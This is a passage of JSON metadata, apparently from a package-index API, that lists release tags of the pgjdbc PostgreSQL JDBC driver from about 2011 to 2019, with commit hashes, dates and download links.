GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.7/manifests"},{"name":"REL42.2.6","sha":"cf42ba2a804d81a49e91e26c772fbed3d5eb43be","kind":"tag","published_at":"2019-06-19T19:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.6/manifests"},{"name":"REL42.2.5","sha":"a1a5ae4f2283d4557f36756d1a0228310a3acccb","kind":"tag","published_at":"2018-08-27T15:38:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.5/manifests"},{"name":"REL42.2.4","sha":"b3821baff00a9517f40278b5160a7495fa42a7ad","kind":"tag","published_at":"2018-07-14T13:42:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.4/manifests"},{"name":"REL42.2.3","sha":"220c02fce06980733163020634f97cf2d8483f39","kind":"tag","published_at":"2018-07-12T09:44:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.3/manifests"},{"name":"REL42.2.2","sha":"c9b1678f519243cb4b044e1bc7cab59070ac1a58","kind":"tag","published_at":"2018-03-15T16:13:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.2/manifests"},{"name":"REL42.2.1","sha":"7bb4ebc1c5775a0dca0adf8d760acd5336d355fc","kind":"tag","published_at":"2018-01-25T15:42:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.1/manifests"},{"name":"REL42.2.0","sha":"0bbd405590d898a184d5f46331cc803c5a1b22c6","kind":"tag","published_at":"2018-01-17T17:22:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.0/manifests"},{"name":"REL42.1.4","sha":"32fb99e7a8a583e057a9f59e8e5bac1571701233","kind":"tag","published_at":"2017-08-01T17:09:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.4/manifests"},{"name":"REL42.1.3","sha":"29fe74ee13300811aa05dd233d149763203ef40f","kind":"tag","published_at":"2017-07-14T08:36:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.3/manifests"},{"name":"REL42.1.2","sha":"de44a7623a05e2b4d075c84692cda2ab7a208157","kind":"tag","published_at":"2017-07-12T15:23:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.2/manifests"},{"name":"REL42.1.1","sha":"2e2ac0d294168d1896a90da470864c12af491a6b","kind":"tag","published_at":"2017-05-05T22:20:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.1/manifests"},{"name":"REL42.1.0","sha":"95e06e744ea3b9f4ff7de856d227d64fba32e45e","kind":"tag","published_at":"2017-05-04T21:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.1.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.1.0/manifests"},{"name":"REL42.0.0","sha":"e06a13ad8f17d04e98087039b6e346474b20e257","kind":"tag","published_at":"2017-02-18T19:26:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.0.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.0.0/manifests"},{"name":"REL9.4.1212","sha":"4d7a7618adb6c2b3a82a770d84747aeee4b55384","kind":"tag","published_at":"2016-11-02T17:09:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1212","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1212","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1212","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1212/manifests"},{"name":"REL9.4.1211","sha":"f808def0c90114f8912135553a77fe3d7625e9db","kind":"tag","published_at":"2016-09-18T13:55:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1211","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1211","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1211","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1211/manifests"},{"name":"REL9.4.1210","sha":"b29c95fa924eca19c002b8d21e2e216646c18faa","kind":"tag","published_at":"2016-09-06T20:46:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1210","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1210","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1210","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1210/manifests"},{"name":"REL9.4.1209","sha":"51684d9a898e8b6853e04d01b2f99e06e01e55dd","kind":"tag","published_at":"2016-07-15T13:00:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1209","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1209","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1209","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1209/manifests"},{"name":"REL9.4.1208","sha":"5b4c6fad736d71f5ed654ac4e2913b006591c8fe","kind":"tag","published_at":"2016-02-19T19:35:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1208","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1208","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1208","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1208/manifests"},{"name":"REL9.4.1207","sha":"f17e2f3074a95dc767d6d896ffd696e045b48466","kind":"tag","published_at":"2015-12-22T20:21:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9.4.1207","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9.4.1207","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9.4.1207","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9.4.1207/manifests"},{"name":"REL9_4_1206","sha":"e0a9b414eab3e1186e9af0450aaa9dfbf096f59e","kind":"commit","published_at":"2015-11-25T20:49:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1206","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1206","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1206","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1206/manifests"},{"name":"REL9_4_1205","sha":"fe777e75aa1a8098edc5de44d97895049f4f6518","kind":"commit","published_at":"2015-11-03T15:48:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1205","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1205","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1205","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1205/manifests"},{"name":"REL9_3_1104","sha":"de86e79d80ed08580fe0019d0696e9591035902c","kind":"commit","published_at":"2015-10-09T19:11:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1104","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1104","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1104/manifests"},{"name":"REL9_4_1204","sha":"a194c5e5429bb6edb0465b6fd254ea1d78237f54","kind":"commit","published_at":"2015-10-09T18:55:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1204","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1204","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1204","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1204/manifests"},{"name":"REL9_4_1203","sha":"a0bafcd8158b1938159fb49894fa403e04238267","kind":"commit","published_at":"2015-09-17T21:10:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1203","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1203","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1203","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1203/manifests"},{"name":"REL9_4_1202","sha":"8e3e868792a27625c65021f7733661614c02aaa0","kind":"commit","published_at":"2015-08-27T20:45:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1202","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1202","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1202","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1202/manifests"},{"name":"REL9_4_1201","sha":"a4f8c9ecfe0cf8f162f49bdfd8db5ff0baedb233","kind":"commit","published_at":"2015-02-25T16:00:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1201","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1201","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1201","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201/manifests"},{"name":"REL9_4_1200","sha":"77ab3f6c92e931bc44ed97248ab367a4c798b687","kind":"tag","published_at":"2015-01-28T12:36:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1200","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1200","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1200","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200/manifests"},{"name":"REL9_3_1103","sha":"ed37012bb880dde1c2a8b2949dfa47bbad6d7c37","kind":"commit","published_at":"2015-01-02T20:04:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1103","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103/manifests"},{"name":"REL9_3_1102","sha":"820d560ff5ade8cd63083339d23b655ba5def6a7","kind":"tag","published_at":"2014-07-10T20:55:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1102","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102/manifests"},{"name":"REL9_3_1101","sha":"f2d036adbea166e9a6574b6ee430e81dcd6d5f7e","kind":"commit","published_at":"2014-02-18T13:50:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1101","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1101","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1101","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101/manifests"},{"name":"REL9_2_1004","sha":"38152acc7b38c74476d9f85f21216c586ada7988","kind":"tag","published_at":"2013-10-31T14:04:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1004","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1004","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1004","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004/manifests"},{"name":"REL9_3_1100","sha":"09eb20272c825cac351ba4bb8c251ed7bb5dd5d3","kind":"tag","published_at":"2013-10-31T14:02:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1100","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1100","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1100","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100/manifests"},{"name":"REL9_2_1003","sha":"947d5ab59c3bdfb43468ee5251aef1c73e91c9fd","kind":"tag","published_at":"2013-06-06T13:43:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1003","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1003","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1003","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003/manifests"},{"name":"REL9_2_1001","sha":"1cd438695dc35cf4c1453e5d225f698c28d7389e","kind":"tag","published_at":"2012-11-14T21:54:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1001","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1001","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1001","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001/manifests"},{"name":"REL9_2_1002","sha":"f9c2e98d9c80abb2b04690c8bc0c16f11a797c79","kind":"tag","published_at":"2012-11-14T21:29:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1002","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1002","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1002","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002/manifests"},{"name":"REL9_1_903","sha":"3fdf1a0f4f533a1bdf59e7e0f3e5e49656d30d5b","kind":"commit","published_at":"2012-09-27T14:08:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_903","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_903","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_903","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903/manifests"},{"name":"list","sha":"1f0403ea22970855e6a4f3164180ac7077cfebdf","kind":"commit","published_at":"2012-05-02T18:12:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/list","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/list","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@list","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list/manifests"},{"name":"REL9_1_902","sha":"557d6f329197b293b2220fb7ebf0be3709c06f88","kind":"commit","published_at":"2012-04-26T01:42:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_902","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_902","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_902","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902/manifests"},{"name":"REL9_1_901","sha":"928f33efecaf0c541b95e3c9e8404f7ba617d0eb","kind":"commit","published_at":"2011-09-11T01:38:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_901","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_901","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_901","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901/manifests"},{"name":"REL9_0_802","sha":"6b3a04fc10e71ff4affd6624a53d24b3fad20999","kind":"commit","published_at":"2011-09-11T01:18:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_802","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_802","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_802","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802/manifests"},{"name":"REL8_4_703","sha":"8f4050a1ec42b9db646193381db2a3e6bb981c75","kind":"commit","published_at":"2011-09-11T01:17:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_703","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_703","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_703","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703/manifests"},{"name":"REL8_3_607","sha":"87173901b381a34c0010b3b4d45223c40ef1c76f","kind":"commit","published_at":"2011-09-11T01:14:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_607","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_607","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_607","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607/manifests"},{"name":"REL8_2_512","sha":"2765d2fe73dcab4016950ec63857e530087464d1","kind":"commit","published_at":"2011-09-10T04:24:56.000Z","download_url":"https://codeload.githu